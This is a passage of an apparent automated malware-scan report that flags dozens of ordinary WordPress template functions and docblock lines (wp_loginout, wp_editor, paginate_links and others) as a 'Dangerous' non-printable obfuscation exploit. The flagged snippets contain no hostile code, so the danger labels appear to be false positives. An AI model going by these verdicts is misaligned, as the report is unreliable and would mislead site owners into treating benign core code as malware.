<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if `</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">log in</span><span style="color: #007700">/</span><span style="color: #0000BB">out link </span><span style="color: #007700">if `</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">is false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3848</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] </span><span style="color: #0000BB">A </span><span style="color: #007700">list </span><span style="color: #0000BB">of unique hosts of enqueued scripts </span><span style="color: #007700">and </span><span style="color: #0000BB">styles</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_loginout</span><span style="color: #007700">( </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3850</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_dependencies_unique_hosts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3875</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$unique_hosts</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3893</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">the user can access the visual editor</span><span style="color: #007700">, </span><span style="color: #0000BB">false otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">user_can_richedit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3919</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'user_can_richedit'</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_rich_edit </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3930</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Either </span><span style="color: #DD0000">'tinymce'</span><span style="color: #007700">, </span><span style="color: #DD0000">'html'</span><span style="color: #007700">, or </span><span style="color: #DD0000">'test'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_default_editor</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_default_editor'</span><span style="color: #007700">, </span><span style="color: #0000BB">$r </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3952</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is the proper way to output all needed components </span><span style="color: #007700">for </span><span style="color: #0000BB">both TinyMCE </span><span style="color: #007700">and </span><span style="color: #0000BB">Quicktags</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_editor</span><span style="color: #007700">( </span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$editor_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$settings </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3986</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_enqueue_editor</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array|</span><span style="color: #0000BB">false Settings </span><span style="color: #007700">for </span><span style="color: #0000BB">the enqueued code editor</span><span style="color: #007700">, or </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the editor was not enqueued</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4017</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_enqueue_code_editor</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'loginout'</span><span style="color: #007700">, </span><span style="color: #0000BB">$link </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$settings</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4088</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns code editor settings</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the URL that allows the user to log out of the site</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array|</span><span style="color: #0000BB">false Settings </span><span style="color: #007700">for </span><span style="color: #0000BB">the code editor</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_code_editor_settings</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_logout_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 433</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'logout_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">$logout_url</span><span style="color: #007700">, </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a falsey value will disable the syntax</span><span style="color: #007700">-</span><span style="color: #0000BB">highlighting code editor</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_code_editor_settings'</span><span style="color: #007700">, </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The login URL</span><span style="color: #007700">. </span><span style="color: #0000BB">Not HTML</span><span style="color: #007700">-</span><span style="color: #0000BB">encoded</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_search_query</span><span style="color: #007700">( </span><span style="color: #0000BB">$escaped </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_login_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$redirect </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$force_reauth </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$query</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_search_query</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4503</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string A space</span><span style="color: #007700">-</span><span style="color: #0000BB">separated </span><span style="color: #007700">list </span><span style="color: #0000BB">of language attributes</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4505</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_language_attributes</span><span style="color: #007700">( </span><span style="color: #0000BB">$doctype </span><span style="color: #007700">= </span><span style="color: #DD0000">'html' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_rtl' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_rtl</span><span style="color: #007700">() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4534</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'language_attributes'</span><span style="color: #007700">, </span><span style="color: #0000BB">$output</span><span style="color: #007700">, </span><span style="color: #0000BB">$doctype </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4548</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">language_attributes</span><span style="color: #007700">( </span><span style="color: #0000BB">$doctype </span><span style="color: #007700">= </span><span style="color: #DD0000">'html' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can be used to create paginated link </span><span style="color: #007700">list for </span><span style="color: #0000BB">any</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned value</span><span style="color: #007700">. </span><span style="color: #0000BB">The </span><span style="color: #007700">default </span><span style="color: #0000BB">is</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">an </span><span style="color: #007700">array </span><span style="color: #0000BB">of the paginated link </span><span style="color: #007700">list </span><span style="color: #0000BB">to offer full</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4621</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned value</span><span style="color: #007700">. </span><span style="color: #0000BB">Possible values are </span><span style="color: #DD0000">'plain'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">string</span><span style="color: #007700">[]|</span><span style="color: #0000BB">void String of page links </span><span style="color: #007700">or array </span><span style="color: #0000BB">of page links</span><span style="color: #007700">, </span><span style="color: #0000BB">depending on </span><span style="color: #DD0000">'type' </span><span style="color: #0000BB">argument</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">paginate_links</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'login_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">$login_url</span><span style="color: #007700">, </span><span style="color: #0000BB">$redirect</span><span style="color: #007700">, </span><span style="color: #0000BB">$force_reauth </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the URL that allows the user to register on the site</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string User registration URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 477</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_registration_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4786</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$page_links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4810</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$r</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4839</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_admin_css_color</span><span style="color: #007700">( </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$colors </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$icons </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'register_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">site_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp-login.php?action=register'</span><span style="color: #007700">, </span><span style="color: #DD0000">'login' </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4864</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_admin_color_schemes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">it instead</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_admin_css_uri</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">= </span><span style="color: #DD0000">'wp-admin' </span><span style="color: #007700">) {</span>
</span>
